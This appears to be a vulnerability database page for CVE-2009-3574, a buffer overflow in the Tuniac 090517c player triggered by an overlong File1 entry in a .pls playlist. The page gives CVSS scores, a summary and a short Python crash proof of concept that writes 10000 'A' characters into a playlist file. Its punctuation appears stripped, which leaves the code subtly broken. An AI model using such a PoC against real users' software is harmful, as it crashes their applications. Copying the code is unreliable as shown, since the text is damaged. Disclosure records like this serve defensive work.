9.3
CVSSv2

CVE-2009-3574

Published: 06/10/2009 Updated: 19/09/2017
CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6
VMScore: 935
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

Tuniac 090517c allows remote malicious users to cause a denial of service (crash) or possibly execute arbitrary code via a long File1 argument in a .pls playlist file, possibly a buffer overflow.

Vulnerable Product Search on Vulmon Subscribe to Product

tony million tuniac 090517c

Exploits

#!/usr/bin/env python # Tuniac v090517c (PLS) Crash PoC # By : zAx # sourceforgenet/projects/tuniac/files/tuniac/090517/Tuniac_Setup_090517cexe/download buffer = ("[playlist]\x0ANumberOfEntries=1\x0AFile1=" + "\x41" * (10000)); f = open('Crash_PocPLS','w'); fwrite(buffer); fclose(); # milw0rmcom [2009-09-14] ...